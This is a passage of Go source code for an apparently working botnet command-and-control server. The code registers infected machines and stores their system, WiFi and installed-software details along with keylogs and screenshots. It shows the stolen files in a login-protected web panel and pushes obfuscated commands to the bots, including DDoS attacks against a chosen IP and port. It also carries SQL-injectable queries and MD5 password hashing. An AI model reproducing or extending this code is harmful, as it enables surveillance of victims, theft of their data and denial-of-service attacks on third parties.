i4vcGFuZWwiPntNRVNTQUdFfSBSZXR1cm4gdG8gQ29udHJvbCBQYW5lbDwvYT4KPC9kaXY+CjwvYm9keT4KPC9odG1sPg==`)
)

type BotList struct {
	DBTotal    string
	DBAdmin    string
	TotalFiles string

	DBGUID        string
	DBIP          string
	DBWHOAMI      string
	DBOS          string
	DBADMINRIGHTS string
	DBANTIVIRUS   string
	DBLASTCHECKIN string
}

func count() int { //Count Bot Rows
	rows, err := db.Query("SELECT COUNT(*) AS count FROM clients")
	if err != nil {
		return 0
	}
	var count int

	defer rows.Close()
	for rows.Next() {
		rows.Scan(&count)
	}
	return count
}

func countAdmin() int { //Count Bot Rows with admin
	rows, _ := db.Query("SELECT COUNT(*) AS count FROM clients WHERE isadmin= 'Yes'")
	var count int

	defer rows.Close()
	for rows.Next() {
		rows.Scan(&count)
	}
	return count
}

func reportError(w http.ResponseWriter, err error) {
	fmt.Fprintf(w, "Error during operation: %s", err)
}

func countFiles() int { //Count # of files
	var tmpint int
	profiles, _ := ioutil.ReadDir("./Profiles")
	for _, f := range profiles {
		files, _ := ioutil.ReadDir("./Profiles/" + f.Name() + "/Files")
		tmpint = tmpint + len(files)
	}
	return tmpint
}

func createcountDiv() string {
	return `<div align="center">Total in Database: [` + strconv.Itoa(count()) + `] | Total with Admin: [` + strconv.Itoa(countAdmin()) + `] | Total Files in Database: [` + strconv.Itoa(countFiles()) + `]</div>`
}

func getLastLogin(set bool) string {
	var tmp string
	if set {
		_, err := db.Exec("UPDATE lastlogin SET timeanddate='" + time.Now().Format(time.RFC850) + "' WHERE id=1")
		if err != nil {
			fmt.Println(err)
		}
		return ""
	} else {
		err := db.QueryRow("SELECT timeanddate FROM lastlogin WHERE id=1").Scan(&tmp)
		if err != nil {
			return "Never"
		}
		return tmp
	}
	return "Never"
}

func newHandler(response http.ResponseWriter, request *http.Request) { //Get Basic Information (GUID, IP, Is Admin, Ect...)
	if isEnabled {
		if isNew {
			if request.UserAgent() == userAgentKey {

				request.ParseForm()
				//CONIP := strings.Split(request.RemoteAddr, ":")[0]
				GUID := request.FormValue("0")
				IP := request.FormValue("1")
				WHOAMI := request.FormValue("2")
				OS := request.FormValue("3")
				INSTALL := request.FormValue("4")
				ADMIN := request.FormValue("5")
				AV := request.FormValue("6")
				CPU := request.FormValue("7")
				GPU := request.FormValue("8")
				VERSION := request.FormValue("9")
				SYSINFO := request.FormValue("10")
				WIFIINFO := request.FormValue("11")
				IPCON := request.FormValue("12")
				INSTSOFT := request.FormValue("13")
				INTPIC := request.FormValue("14")

				//Make Security checks to see if is valid data and not junk...
				//Maybe compair IP of Bots info with the request IP?
				//Check for duplicates, ignore if dupe found
				//Look for key words that should be found in it

				var tmpguid string
				err := db.QueryRow("SELECT guid FROM clients WHERE guid=?", GUID).Scan(&tmpguid)
				switch {
				case err == sql.ErrNoRows:
					_, err = db.Exec("INSERT INTO clients(guid, ip, whoami, os, installdate, isadmin, antivirus, cpuinfo, gpuinfo, clientversion, lastcheckin, lastcommand) VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)", GUID, IP, WHOAMI, OS, INSTALL, ADMIN, AV, CPU, GPU, VERSION, time.Now().Format(time.RFC850), "Not Completed....")
					if err != nil {
						logUpdate("ERROR with Database! " + err.Error())
						return
					}

					_ = createDir("./Profiles/"+GUID+"/", 777)
					_ = createDir("./Profiles/"+GUID+"/Files", 777)
					_ = createDir("./Profiles/"+GUID+"/Screenshots", 777)
					_ = createDir("./Profiles/"+GUID+"/Keylogs", 777)

					writefile, _ := os.Create("./Profiles/" + GUID + "/Screenshots/Default.png")
					writefile.WriteString(string(base64Decode(INTPIC)))
					writefile.Close()

					output := strings.Replace(base64Decode(INSTSOFT), "|", "\n", -1)

					_ = createFileAndWriteData("./Profiles/"+GUID+"/Files/System Information.txt", []byte(base64Decode(SYSINFO)))
					_ = createFileAndWriteData("./Profiles/"+GUID+"/Files/WiFi Information.txt", []byte(base64Decode(WIFIINFO)))
					_ = createFileAndWriteData("./Profiles/"+GUID+"/Files/IP Config.txt", []byte(base64Decode(IPCON)))
					_ = createFileAndWriteData("./Profiles/"+GUID+"/Files/Installed Software.txt", []byte(output))

					logUpdate("New bot registered " + GUID)

					fmt.Fprintf(response, "ok")
				case err != nil:
					fmt.Fprintf(response, "err")
				default:
					fmt.Fprintf(response, "exist")
				}
			}
		}
	}
}

func updateHandler(response http.ResponseWriter, request *http.Request) { //Update selected rows)
	if isEnabled {
		request.ParseForm()
		//conip := strings.Split(request.RemoteAddr, ":")[0]
		//name := request.FormValue("0")
		//pass := request.FormValue("1")

		//Check if GUID already exists in DB, If not...
		//Add all the data to DB row for the bot
		//If good, return "ok" else "bad" and bot will try again later
		fmt.Fprintf(response, "ok")
	}
}

func screenshotHandler(response http.ResponseWriter, request *http.Request) { //Create a ScreenShot imange
	if isEnabled {
		if request.UserAgent() == userAgentKey {
			request.ParseForm()
			GUID := request.Form.Get("0") //Does this work, need to test
			DATA := request.FormValue("1")
			var tmpguid string
			var tmpint int
			files, _ := ioutil.ReadDir("./Profiles/" + GUID + "/Screenshots")
			tmpint = len(files) + 1
			s1 := strconv.Itoa(tmpint)
			err := db.QueryRow("SELECT guid FROM clients WHERE guid=?", GUID).Scan(&tmpguid)
			if err == sql.ErrNoRows {
				fmt.Fprintf(response, "spin") //Tell bot it needs to register
			} else { //Return Command from SQL
				result := strings.Replace(time.Now().Format(time.RFC822), ":", "-", -1)
				writefile, _ := os.Create("./Profiles/" + GUID + "/Screenshots/" + s1 + "." + result + ".png") //example: 9283.29 Oct 16 23-50 EDT.png
				writefile.WriteString(string(base64Decode(DATA)))
				writefile.Close()
				//logUpdate("New screenshot from " + guid)
				fmt.Fprintf(response, "done")
			}
		}
	}
}

func keylogHandler(response http.ResponseWriter, request *http.Request) {
	if isEnabled {
		if request.UserAgent() == userAgentKey {
			request.ParseForm()
			GUID := request.Form.Get("0")
			DATA := request.FormValue("1")
			var tmpguid string
			var tmpint int
			files, _ := ioutil.ReadDir("./Profiles/" + GUID + "/Keylogs")
			tmpint = len(files) + 1
			s1 := strconv.Itoa(tmpint)
			err := db.QueryRow("SELECT guid FROM clients WHERE guid=?", GUID).Scan(&tmpguid)
			if err == sql.ErrNoRows {
				fmt.Fprintf(response, "spin") //Tell bot it needs to register
			} else { //Return Command from SQL
				result := strings.Replace(time.Now().Format(time.RFC822), ":", "-", -1)
				writefile, _ := os.Create("./Profiles/" + GUID + "/Keylogs/" + s1 + "." + result + ".txt") //example: 9283.29 Oct 16 23-50 EDT.txt
				writefile.WriteString(string(base64Decode(DATA)))
				writefile.Close()
				fmt.Fprintf(response, "done")
			}
		}
	}
}

func profileFilesHandler(response http.ResponseWriter, request *http.Request) { //Host the Profiles folder and sub files.
	if isEnabled {
		userName := getUserName(request)
		if userName != "" {
			url := request.URL.Path

			var newurl = strings.Replace(url, "files", "", -1)

			var fixhtml2 string

			// Ignore favicon
			if newurl == "/favicon.ico" {
			} else {
				urlPath := baseDir + newurl
				f, err := os.Open(urlPath)
				if err != nil {
					reportError(response, err)
					return
				}

				defer f.Close()
				fi, err := f.Stat()
				if err != nil {
					reportError(response, err)
					return
				}

				// Have enough info to figure out what to send back
				switch mode := fi.Mode(); {
				case mode.IsDir():
					files, err := ioutil.ReadDir(urlPath)
					if err != nil {
						reportError(response, err)
						return
					}

					last, err := filepath.Abs(path.Join(url, ".."))
					if err != nil {
						reportError(response, err)
						return
					}

					output := "<li>[Dir] <a href=\"" + last + "\">..</a>" //Need to fix this, Its not including the sites address?
					for _, element := range files {
						output += "<li>"
						if element.IsDir() {
							output += "[Dir] "
						} else {
							output += "[File] "
						}
						output += "<a href=\"" + path.Join(url, element.Name()) + "\">" + element.Name() + "</a>"
					}
					var fixhtml = strings.Replace(filebrowseHTML, "{STATS}", createcountDiv(), -1)
					var fixhtml1 = strings.Replace(fixhtml, "{FILES}", output, -1)
					if useSSL {
						fixhtml2 = strings.Replace(fixhtml1, "{HOST}", "https://"+request.Host, -1)
					} else {
						fixhtml2 = strings.Replace(fixhtml1, "{HOST}", "http://"+request.Host, -1)
					}
					fmt.Fprintf(response, fixhtml2)
				case mode&os.ModeType == 0:
					content := "application/octet-stream"
					extension := filepath.Ext(urlPath)
					switch extension {
					case ".pdf":
						content = "application/pdf"
					case ".mp3":
						content = "audio/mp3"
					case ".jpg":
						content = "image/jpeg"
					case ".gif":
						content = "image/gif"
					case ".png":
						content = "image/png"
					case ".css":
						content = "text/css"
					case ".html":
						content = "text/html"
					case ".js":
						content = "text/javascript"
					case ".mp4":
						content = "video/mp4"
					case ".sh":
						content = "text/plain"
					case ".txt":
						content = "text/plain"
					case ".xml":
						content = "application/xml"
					}

					text, err := ioutil.ReadFile(urlPath)
					if err != nil {
						reportError(response, err)
						return
					}

					response.Header().Set("Content-Type", content)
					response.Write(text)
				}
			}
		} else {
			fmt.Fprintf(response, loginHTML)
		}
	}
}

func uploadHandler(response http.ResponseWriter, request *http.Request) { //Upload file
	if isEnabled {
		//guid := request.FormValue("0")

		//display success message.
	}
}

func setCommand(cmd string) bool { //Set Command to DB
	var tmpcmd string

	_ = db.QueryRow("SELECT command FROM command WHERE id=1").Scan(&tmpcmd)
	if tmpcmd == "" {
		_, err := db.Exec("INSERT INTO command(id, command, timeanddate) VALUES(?, ?, ?)", 1, "none", "never")
		if err != nil {
			fmt.Println(err)
			return false
		}
	}

	_, err := db.Exec("UPDATE command SET command='" + cmd + "', timeanddate='" + time.Now().Format(time.RFC850) + "' WHERE id=1")
	if err != nil {
		fmt.Println(err)
		return false
	}
	return true
}

func commandHandler(response http.ResponseWriter, request *http.Request) { //Return Command from DB
	if isEnabled {
		if request.UserAgent() == userAgentKey {
			request.ParseForm()

			GUID := request.Form.Get("0")
			CHECK := request.Form.Get("1") //See if the bot confirming it ran the last command

			var tmpguid string
			var tmpcmd string
			var tmpdata string

			err := db.QueryRow("SELECT guid FROM clients WHERE guid=?", GUID).Scan(&tmpguid)

			if err == sql.ErrNoRows {

				fmt.Fprintf(response, "spin") //Tell bot it needs to register

			} else { //Return Command from SQL

				err := db.QueryRow("SELECT command, timeanddate FROM command WHERE id=1").Scan(&tmpcmd, &tmpdata)
				if err != nil {
					//logUpdate("Somethings wrong with the Command Database")
					fmt.Fprintf(response, "spin") //No commands in the table?
				}
				//UPDATE `clients` SET `lastcheckin` = 'Sunday, 06-Nov-16 01:08:11 EST', `lastcommand` = 'Not Completed...' WHERE `clients`.`guid` = '86b4f9e6-366b-47b0-ab4e-15c6cd2f7074';
				_, err = db.Exec("UPDATE clients SET lastcommand='" + CHECK + "' WHERE guid='" + GUID + "'")
				if err != nil {
					fmt.Println(err)
				}

				_, err = db.Exec("UPDATE clients SET lastcheckin='" + time.Now().Format(time.RFC850) + "' WHERE guid='" + GUID + "'")
				if err != nil {
					fmt.Println(err)
				}

				fmt.Fprintf(response, tmpdata+"||"+tmpcmd)
			}
		}
	}
}

func commandIssue() (string, string) {
	var tmpcmd string
	var tmpdatetime string

	_ = db.QueryRow("SELECT command FROM command WHERE id=1").Scan(&tmpcmd)
	_ = db.QueryRow("SELECT timeanddate FROM command WHERE id=1").Scan(&tmpdatetime)

	if tmpcmd == "" {
		tmpcmd = "None"
	}
	if tmpdatetime == "" {
		tmpdatetime = "Never"
	}

	return tmpcmd, tmpdatetime
}

func logoutHandler(response http.ResponseWriter, request *http.Request) {
	if isEnabled {
		clearSession(response)
		http.Redirect(response, request, "/", 302)
	}
}

func loginHandler(response http.ResponseWriter, request *http.Request) {
	if isEnabled {
		if isPanel {
			request.ParseForm()
			ip := strings.Split(request.RemoteAddr, ":")[0]
			name := request.FormValue("username")
			pass := request.FormValue("password")
			redirectTarget := "/"
			if name != "" && pass != "" {
				if name == ControlUser && md5Hash(pass) == ControlPass || loginBasic(name, pass) {
					setSession(name, response)
					redirectTarget = "/panel"
				}
				http.Redirect(response, request, redirectTarget, 302)
			} else {
				logUpdate("Failed View Login from " + ip + " using " + name + " and password " + pass)
				fmt.Fprintf(response, "404 page not found")
			}
		}
	}
}

func infoHandler(response http.ResponseWriter, request *http.Request) {
	if isEnabled {
		userName := getUserName(request)
		if userName != "" {
			//output := strings.Replace(infoHTML, "{CPU}", CPU, -1)
			request.ParseForm()
			GUID := request.Form.Get("guid")

			var tmpguid string

			err := db.QueryRow("SELECT guid FROM clients WHERE guid=?", GUID).Scan(&tmpguid)
			if err == sql.ErrNoRows {
				//Does not exist?
				r := strings.NewReplacer("{STATS}", createcountDiv(), "{ERROR}", "No entry by GUID found")
				result := r.Replace(errorHTML)
				fmt.Fprintf(response, result)
			} else {
				//Found, lets get the info we need....
				var tmpip string
				var tmpwhoami string
				var tmpos string
				var tmpinstall string
				var tmpisadmin string
				var tmpav string
				var tmpcpu string
				var tmpgpu string
				var tmpver string
				var tmplastcheck string

				err := db.QueryRow("SELECT ip, whoami, os, installdate, isadmin, antivirus, cpuinfo, gpuinfo, clientversion, lastcheckin FROM clients WHERE guid=?", GUID).Scan(&tmpip, &tmpwhoami, &tmpos, &tmpinstall, &tmpisadmin, &tmpav, &tmpcpu, &tmpgpu, &tmpver, &tmplastcheck)
				if err != nil {
					r := strings.NewReplacer("{STATS}", createcountDiv(), "{ERROR}", "Database Error")
					result := r.Replace(errorHTML)
					fmt.Fprintf(response, result)
				}

				r := strings.NewReplacer("{STATS}", createcountDiv(), "{GUID}", GUID, "{IP}", tmpip, "{WHOAMI}", tmpwhoami, "{OS}", tmpos, "{ADMIN}", tmpisadmin, "{AV}", tmpav, "{LASDATE}", tmplastcheck, "{INSDATE}", tmpinstall, "{CPU}", tmpcpu, "{GPU}", tmpgpu, "{VERSION}", tmpver)
				result := r.Replace(infoHTML)

				rr := strings.NewReader(result)
				io.Copy(response, rr) //dirty, to lazy to fix the damn error so this will work fine.
			}
		} else {
			fmt.Fprintf(response, loginHTML)
		}
	}
}

func panelHandler(response http.ResponseWriter, request *http.Request) {
	if isEnabled {
		if isPanel {
			userName := getUserName(request)
			if userName != "" {
				request.ParseForm()
				OFFSET := request.Form.Get("page") //Row count Offset

				var top = count()
				if OFFSET == "" {
					OFFSET = "1"
				}
				offsetint, _ := strconv.Atoi(OFFSET)
				if top == 0 {
					r := strings.NewReplacer("{STATS}", createcountDiv(), "{ERROR}", "No Bots in Database")
					result := r.Replace(errorHTML)
					fmt.Fprintf(response, result)
				} else {
					var tableRaw string
					//Need {GUID}, {IP}, {WHOAMI}, {OS}, {ADMIN}, {AV} and {LASDATE)
					var tmpguid, tmpip, tmpwhoami, tmpos, tmpadmin, tmplastcheck string
					rows, err := db.Query("SELECT guid, ip, whoami, os, isadmin, lastcheckin FROM clients ORDER BY id DESC LIMIT ? OFFSET ?", maxBotList, maxBotList*(offsetint-1))
					//fmt.Println("Query: ", err.Error)
					if err != nil && err != sql.ErrNoRows {
						r := strings.NewReplacer("{STATS}", createcountDiv(), "{ERROR}", "Database Error")
						result := r.Replace(errorHTML)
						fmt.Fprintf(response, result)
					}

					for rows.Next() {
						err := rows.Scan(&tmpguid, &tmpip, &tmpwhoami, &tmpos, &tmpadmin, &tmplastcheck)

						if err != nil {
							r := strings.NewReplacer("{STATS}", createcountDiv(), "{ERROR}", "Database Error")
							result := r.Replace(errorHTML)
							fmt.Fprintf(response, result)
						}

						var tmptableRaw string
						tmptableRaw = botTableHTML
						r := strings.NewReplacer("{GUID}", tmpguid, "{IP}", tmpip, "{WHOAMI}", tmpwhoami, "{OS}", tmpos, "{ADMIN}", tmpadmin, "{LASDATE}", tmplastcheck)
						result := r.Replace(tmptableRaw)
						tableRaw += result
					}

					var s string
					if offsetint != 1 {
						s = strconv.Itoa(offsetint - 1)
					} else {
						s = strconv.Itoa(offsetint)
					}

					s1 := strconv.Itoa(offsetint + 1)

					r := strings.NewReplacer("{STATS}", createcountDiv(), "{RAWTABLE}", tableRaw, "{BACK}", s, "{NEXT}", s1)
					result := r.Replace(panelHTML)

					rr := strings.NewReader(result)

					io.Copy(response, rr) //still dirty
				}
			} else {
				fmt.Fprintf(response, loginHTML)
			}
		} else {
			fmt.Fprintf(response, "404 page not found")
		}
	}
}

func sendCMDHandler(response http.ResponseWriter, request *http.Request) {
	if isEnabled {
		userName := getUserName(request)
		if userName != "" {
			request.ParseForm()
			var guidList []string
			guidList = request.Form["selectedbot"]             //All the selected bots
			botSelection := request.FormValue("botsselection") //Selected or All bots
			commandType := request.FormValue("commandtype")    //Command Code, See manual
			arguments := request.FormValue("arg1")             //Args for the command
			if botSelection == "" || commandType == "" || arguments == "" {
				r := strings.NewReplacer("{STATS}", createcountDiv(), "{ERROR}", "Somethings not right...")
				result := r.Replace(errorHTML)
				fmt.Fprintf(response, result)
			} else {
				var tmpguidlist string

				if botSelection == "000" {
					tmpguidlist = "000"
				} else {
					for _, guid := range guidList {
						tmpguidlist += guid + ","
					}
				}
				tmpstring := tmpguidlist + "|" + commandType + "|" + arguments
				done := setCommand(obfuscate(base64Encode(tmpstring)))
				if done {
					r := strings.NewReplacer("{STATS}", createcountDiv(), "{MESSAGE}", "Command Issued!")
					result := r.Replace(successHTML)
					fmt.Fprintf(response, result)
				} else {
					r := strings.NewReplacer("{STATS}", createcountDiv(), "{ERROR}", "Issuing Command")
					result := r.Replace(errorHTML)
					fmt.Fprintf(response, result)
				}
			}
		} else {
			fmt.Fprintf(response, loginHTML)
		}
	}
}

func ddosCMDHandler(response http.ResponseWriter, request *http.Request) {
	if isEnabled {
		userName := getUserName(request)
		if userName != "" {
			request.ParseForm()
			ddosmode := request.FormValue("ddosmode")
			ip := request.FormValue("ip")
			port := request.FormValue("port")
			threads := request.FormValue("threads")
			interval := request.FormValue("interval")
			fmt.Println(ddosmode, ip, port, threads, interval)
			if ddosmode == "" || ip == "" || port == "" || threads == "" || interval == "" {
				r := strings.NewReplacer("{STATS}", createcountDiv(), "{ERROR}", "Somethings not right...")
				result := r.Replace(errorHTML)
				fmt.Fprintf(response, result)
			} else {
				tmpstring := "000|0x3|" + ddosmode + "|" + ip + ":" + port + "|" + threads + "|" + interval
				done := setCommand(obfuscate(base64Encode(tmpstring)))
				if done {
					r := strings.NewReplacer("{STATS}", createcountDiv(), "{MESSAGE}", "Command Issued!")
					result := r.Replace(successHTML)
					fmt.Fprintf(response, result)
				} else {
					r := strings.NewReplacer("{STATS}", createcountDiv(), "{ERROR}", "Issuing Command")
					result := r.Replace(errorHTML)
					fmt.Fprintf(response, result)
				}
			}
		} else {
			fmt.Fprintf(response, loginHTML)
		}
	}
}

func stopDDOSHandler(response http.ResponseWriter, request *http.Request) {
	userName := getUserName(request)
	if userName != "" {
		tmpstring := "000|0x4|"
		done := setCommand(obfuscate(base64Encode(tmpstring)))
		if done {
			r := strings.NewReplacer("{STATS}", createcountDiv(), "{MESSAGE}", "Command Issued!")
			result := r.Replace(successHTML)
			fmt.Fprintf(response, result)
		} else {
			r := strings.NewReplacer("{STATS}", createcountDiv(), "{ERROR}", "Issuing Command")
			result := r.Replace(errorHTML)
			fmt.Fprintf(response, result)
		}
	} else {
		fmt.Fprintf(response, loginHTML)
	}
}

func refreshHandler(response http.ResponseWriter, request *http.Request) {
	userName := getUserName(request)
	if userName != "" {
		tmpstring := "000|refresh|"
		done := setCommand(obfuscate(base64Encode(tmpstring)))
		if done {
			r := strings.NewReplacer("{STATS}", createcountDiv(), "{MESSAGE}", "Command Issued!")
			result := r.Replace(successHTML)
			fmt.Fprintf(response, result)
		} else {
			r := strings.NewReplacer("{STATS}", createcountDiv(), "{ERROR}", "Issuing Command")
			result := r.Replace(errorHTML)
			fmt.Fprintf(response, result)
		}
	} else {
		fmt.Fprintf(response, loginHTML)
	}
}

func indexHandler(response http.ResponseWriter, request *http.Request) {
	if isEnabled {
		ip := strings.Split(request.RemoteAddr, ":")[0]
		logUpdate("Index visited by " + ip)
		fmt.Fprintf(response, "404 page not found")
	}
}

func purgeHandler(response http.ResponseWriter, request *http.Request) {
	userName := getUserName(request)
	if userName != "" {
		request.ParseForm()
		GUID := request.Form.Get("guid")
		var tmpguid string

		err := db.QueryRow("SELECT guid FROM clients WHERE guid=?", GUID).Scan(&tmpguid)
		if err == sql.ErrNoRows {
			//Does not exist?
			r := strings.NewReplacer("{STATS}", createcountDiv(), "{ERROR}", "No entry by GUID found")
			result := r.Replace(errorHTML)
			fmt.Fprintf(response, result)
		} else {
			err1 := db.QueryRow("DELETE FROM clients WHERE guid=?", GUID)
			if err1 != nil {
				r := strings.NewReplacer("{STATS}", createcountDiv(), "{ERROR}", "Database Error")
				result := r.Replace(errorHTML)
				fmt.Fprintf(response, result)
			} else {
				//Files will be kept
				r := strings.NewReplacer("{STATS}", createcountDiv(), "{MESSAGE}", "Client Purged from Database!")
				result := r.Replace(successHTML)
				fmt.Fprintf(response, result)
			}
		}
	} else {
		fmt.Fprintf(response, loginHTML)
	}
}

func ipHandler(response http.ResponseWriter, request *http.Request) {
	if isEnabled {
		ip := strings.Split(request.RemoteAddr, ":")[0]
		fmt.Fprintf(response, ip)
	}
}

func loginBasic(user, pass string) bool {
	var databaseUsername string
	var databasePassword string
	err := db.QueryRow("SELECT username, password FROM accounts WHERE username=?", user).Scan(&databaseUsername, &databasePassword)
	if err != nil {
		return false
	}
	if databasePassword == md5Hash(pass) {
		return true
	} else {
		return false
	}
}

func backend() {
	router := mux.NewRouter()
	router.HandleFunc("/", indexHandler)
	router.HandleFunc("/ip", ipHandler)
	router.HandleFunc("/ss", screenshotHandler)
	router.HandleFunc("/key", keylogHandler)
	router.HandleFunc("/new", newHandler).Methods("POST")
	router.HandleFunc("/sendcmd", sendCMDHandler).Methods("POST")
	router.HandleFunc("/cmdddos", ddosCMDHandler).Methods("POST")
	router.HandleFunc("/stopddos", stopDDOSHandler)
	router.HandleFunc("/panel", panelHandler)
	router.HandleFunc("/purge", purgeHandler)
	router.HandleFunc("/refresh", refreshHandler)
	router.HandleFunc("/info", infoHandler)
	http.HandleFunc("/files/", profileFilesHandler)
	router.HandleFunc("/login", loginHandler).Methods("POST")
	router.HandleFunc("/logout", logoutHandler)
	router.HandleFunc("/update", updateHandler).Methods("POST")
	router.HandleFunc("/command", commandHandler)
	http.Handle("/", router)
	if useSSL {
		err := http.ListenAndServeTLS(":"+myPort, "server.crt", "server.key", nil) //:443
		if err != nil {
			logUpdate("SSL Server Error: " + err.Error())
			fmt.Println("SSL Server Error: " + err.Error())
			os.Exit(0)
		}
	} else {
		http.ListenAndServe(":"+myPort, nil)
	}
}

func main() {

	if len(os.Args) < 2 {
		os.Exit(0)
	}

	db, err = sql.Open("mysql", mySQLUser+":"+mySQLPass+"@"+mySQLHost+"/"+mySQLName)
	if err != nil {
		fmt.Println("[!] ERROR: CHECK MYSQL SETTINGS! [!]")
		os.Exit(0)
	}
	defer db.Close()

	err = db.Ping()
	if err != nil {
		fmt.Println("[!] ERROR: CHECK IF MYSQL SERVER IS ONLINE! [!]")
		os.Exit(0)
	}

	go backend()

	if os.Args[1] == ControlUser && md5Hash(os.Args[2]) == ControlPass || loginBasic(os.Args[1], os.Args[2]) {

		rand.Seed(time.Now().UTC().UnixNano())

		if useSSL {
			if !checkFileExist("server.crt") || !checkFileExist("server.key") {
				fmt.Println("[!] WARNING MAKE SURE YOU HAVE YOUR SSL FILES IN THE SAME DIR [!]")
			}
		}

		_ = createDir("./Profiles", 777)
		_ = createDir("./Builds", 777)
		_ = createFile("./logs.txt")

		fmt.Println(banner)
		fmt.Println(" ")
		fmt.Println("Welcome " + ControlUser + "!")
		fmt.Println("====================")
		fmt.Println("Current System Time: " + time.Now().Format(time.RFC850))
		fmt.Println("Last Login: " + getLastLogin(false))
		fmt.Println("====================")

		_ = getLastLogin(true)

		fmt.Println(" ")

		logUpdate(ControlUser + " has logged in.")

		for {

		Start:
			fmt.Print("0-> ")
			scan := bufio.NewScanner(os.Stdin)
			scan.Scan()
			switch scan.Text() {
			case "whoami": //Lists the Address to the C&C server
				if useSSL {
					fmt.Println("https://" + myIP + ":" + myPort + "/")
				} else {
					fmt.Println("http://" + myIP + ":" + myPort + "/")
				}
			case "help": //List Help, Commands and Descriptions
				fmt.Println(" ")
				fmt.Println("===== HELP =====")
				fmt.Println("	help = Shows Help information")
				//	fmt.Println("	listbots = List all known bots")
				fmt.Println("	mode = Enable and Disable Server Functions")
				fmt.Println("	stats = List current BOTNET stats")
				fmt.Println("	command = Advanced BOTNET command Console")
				//fmt.Println("	listproxys = List all running R-Proxy Bots")
				fmt.Println("	whoami = C&C Address for Bots")
				fmt.Println("	tools = C&C Tools")
				fmt.Println("	purge = Purge the bot Database")
				fmt.Println("	panic = Delete and Wipe all C&C Information.")
				fmt.Println("	exit = Shutdown C&C")
				fmt.Println("===== HELP =====")
				fmt.Println(" ")
			case "purge":
				fmt.Println(" ")
				fmt.Println("[!] WARNING: THIS WILL DELETE ALL BOTS AND FILES FROM THE SERVER! [!]")
				fmt.Println("[!] BOTS WILL ATTEMPT TO RE-REGISTER TO C&C ON NEXT CHECK-IN [!]")
				fmt.Println(" ")
				fmt.Println("Are you sure you want to do this?")
				fmt.Print("Yes/No: ")
				scan := bufio.NewScanner(os.Stdin)
				scan.Scan()
				switch scan.Text() {
				case "Yes":

				case "yes":

				case "YES":

				default:
					goto Start
				}
			case "panic": //freak the fuck out and panic to death
				fmt.Println(" ")
				fmt.Println("[!] WARNING: THIS IS DELETE EVERYTHING RELATED TO THE BOTNET! [!]")
				fmt.Println("[!] ALL DATA, FILES, AND THE C&C WILL BE DELETED [!]")
				fmt.Println(" ")
				fmt.Println("Are you sure you want to do this?")
				fmt.Print("Yes/No: ")
				scan := bufio.NewScanner(os.Stdin)
				scan.Scan()
				switch scan.Text() {
				case "Yes":

				case "yes":

				case "YES":

				default:
					goto Start
				}
			case "mode":
				fmt.Println(" ")
				fmt.Println("Enable and Disable Server Functions. Type 'exit' to go back to main menu.")
				fmt.Println(" ")
				for {
					fmt.Print("What to Enable/Disable: ")
					scan := bufio.NewScanner(os.Stdin)
					scan.Scan()
					switch scan.Text() {
					case "all":
						if isEnabled {
							isEnabled = false
							fmt.Println("All Functions Disabled")
							fmt.Println("[!]Warning Bots will not be able to register with the C&C! [!]")
							fmt.Println("[!]Warning Bots will not be able to check for commands with the C&C! [!]")
							fmt.Println("[!]Warning Bots will not be able to upload to the C&C! [!]")
						} else {
							isEnabled = true
							fmt.Println("All Functions Enabled")
						}
					case "panel":
						if isPanel {
							isPanel = false
							fmt.Println("HTML Panel Disabled")
						} else {
							isPanel = true
							fmt.Println("HTML Panel Enabled")
							if useSSL {
								fmt.Println("Login in at " + "https://" + myIP + ":" + myPort + "/panel to view the Panel.")
							} else {
								fmt.Println("Login in at " + "http://" + myIP + ":" + myPort + "/panel to view the Panel.")
							}
						}
					case "new":
						if isNew {
							isNew = false
							fmt.Println("New Bot Registration Disabled")
							fmt.Println("[!]Warning Bots will not be able to register with the C&C! [!]")
						} else {
							isNew = true
							fmt.Println("New Bot Registration Enabled")
						}
					case "help":
						fmt.Println(" ")
						fmt.Println("===== HELP =====")
						fmt.Println("	all = All C&C Functions")
						fmt.Println("	panel = Visual C&C; HTML Panel")
						fmt.Println("	new = Add new bots to the database.")
						fmt.Println("===== HELP =====")
						fmt.Println(" ")
					case "exit":
						goto Start
					case "exit-force":
						os.Exit(0)
					default:
						fmt.Println("[!] Unknown Command! Type 'help' for a list of commands. [!]")
					}
				}
			case "stats": //List Botnet Stats, Bots in DB, Files in DB, Last Check-in, Ect...
				s := strconv.Itoa(count())
				s1 := strconv.Itoa(countAdmin())
				s2 := strconv.Itoa(countFiles())
				fmt.Println("[" + s + "] Total Bots in Database")
				fmt.Println("[" + s1 + "] Total Bots with Admin Rights in Database")
				fmt.Println("[" + s2 + "] Total Files in the Database")
			case "listbots": //List bots, With filters (Country, Admin, Runing server, Ect...)

			case "command": //Add command to DB, Replaces old command.
				//Show old command, Ask for new based on GUID 000 = ALL bots, some type of filter system...
				t1, t2 := commandIssue()
				fmt.Println(" ")
				fmt.Println("This is for Advanced Users! Type 'exit' to leave.")
				fmt.Println("For the normal Visual C&C, activate the panel")
				fmt.Println("Example Command: { 000|0x1|www.google.com|1 } will force all bots to open Google.com")
				fmt.Println("====================")
				fmt.Println("Current Command: " + t1)
				fmt.Println("Current Command Issued: " + t2)
				fmt.Println("====================")
				fmt.Println(" ")
				for {
					fmt.Print("Command: ")
					scan := bufio.NewScanner(os.Stdin)
					scan.Scan()
					switch scan.Text() {
					case "exit":
						goto Start
					case "exit-force":
						os.Exit(0)
					default:
						//Handle Command
						if strings.Contains(scan.Text(), "|") {
							done := setCommand(obfuscate(base64Encode(scan.Text())))
							if done {
								fmt.Println("Command SET!")
							} else {
								fmt.Println("[!] THERE WAS AN ERROR, CHECK DATABASE AND SETTINGS! [!]")
							}
						} else {
							fmt.Println("[!] POSSABLE INVALID COMMAND SYNTAX [!]")
						}
					}
				}
			case "tools": //List C&C Tools
				fmt.Println(" ")
				fmt.Println("Tools")
				fmt.Println("md5 = MD5 HASH of Text.")
				fmt.Println("obfuscate = Obfuscate Text.")
				fmt.Println("deobfuscate = Deobfuscate Text.")
				fmt.Println(" ")
				for {
					fmt.Print("Tool: ")
					scan := bufio.NewScanner(os.Stdin)
					scan.Scan()
					switch scan.Text() {
					case "md5":
						fmt.Print("Text: ")
						scan := bufio.NewScanner(os.Stdin)
						scan.Scan()
						fmt.Println("HASH: " + md5Hash(scan.Text()))
					case "obfuscate":
						fmt.Print("Text: ")
						scan := bufio.NewScanner(os.Stdin)
						scan.Scan()
						fmt.Println("OBFUSCATED: " + obfuscate(scan.Text()))
					case "deobfuscate":
						fmt.Print("Text: ")
						scan := bufio.NewScanner(os.Stdin)
						scan.Scan()
